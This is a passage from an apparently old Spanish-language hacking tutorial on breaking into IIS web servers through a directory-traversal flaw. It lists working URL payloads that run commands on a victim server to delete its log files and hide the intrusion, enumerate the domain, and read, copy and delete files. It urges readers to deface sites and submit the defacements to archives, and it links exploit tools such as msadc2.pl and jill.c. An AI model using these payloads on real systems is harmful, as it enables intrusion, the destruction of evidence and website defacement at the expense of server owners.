TIP: varias veces no podras el del dia mismo ke estas en el sistema,
pero borra el de ayer si kieres etc.. pa ke veas si puedes borrarlos.
y ya al dia siguiente entra y borralo. el del dia ke estuvistes haciendo
el desmadre si es ke el admin. no lo parcho ya! de inmediato. etc..
cuando no puedas veras algo como asi ejem:

CGI Error
The specified CGI application misbehaved by not etc,,,,


c:\winnt\system32\logfiles\w3svc1\in020321.log
The process cannot access the file because
it is being used by another process. 

utts!! :( ni pex hasta ke pegue la 12am pa borrarlo hehe
o si traias proxy ke te valga de borrarlos.

ahora aki ta el comando pa borarr los logs :
www.victim.com/...etc../c+del+c:\winnt\system32\logfiles\w3svc1\in020320.log  
enter y enga!! ya se borro .

Ahora ke ya le haygas hecho deface ahora mandalo a archivar claro ke no sea
un redefacedments por ke se ve lame! lo archivas en defaced.alldas.org
email= defaced@alldas.org o a www.zone-h.com ahi veras como se mandan ahi
pa archivarlos :)

Bueno ya me harte aki hay varios comandos pa ke se diviertan les puede servir
de util en algo kien sabe :
--------------------------------------------------------------------------
www.victim.com/...etc.../winnt/system32/net.exe?view+ /domain

www.victim.com/...etc../winnt/system32/net.exe?view

www.victim.com/..etc../winnt/system32/tracert.exe?IP

www.vicitm.com/..etc../winnt/system32/ping.exe?IP

www.victim.com/..etc......./c+md+c:\IpMazter_was_here  -- create a directory

www.victim.com/..etc......./c+copy+c:\loko.txt+c:\users\texts -- copys loko.txt to that directory

www.victim.com/..etc......./c+type+c:\loko.txt -- see whats inside O_O

www.victim.com/..etc......./c+del+c:\loko.txt  -- deleting

www.victim.com/..etc......./c+copy+c:\loko.txt  and then www.victim.com/scripts/loko.txt
hay mas maneras de hacer un download:)

Bueno aki les mando unos links etc,, y las tools ke se usaron aki no todas casi

nmap: www.insecure.org/nmap
netcat: www.securenterprise.org/downloads/tools/nc11.nt.zip
netcat for linux: www.securenterprise.org/downloads/tools/nc110.tar
decodecheck.pl: www.securenterprise.org/downloads/perl/decodecheck.pl
msadc2.pl : www.securenterprise.org/downloads/perl/msadc2.pl
srcgrab.pl: www.securenterprise.org/downloads/perl/srcgrab.pl
jill.c : www.securenterprise.org/downloads/exploits/jill.c
decodexecute.pl : www.securenterprise.org/downloads/exploits/sensedecode.tgz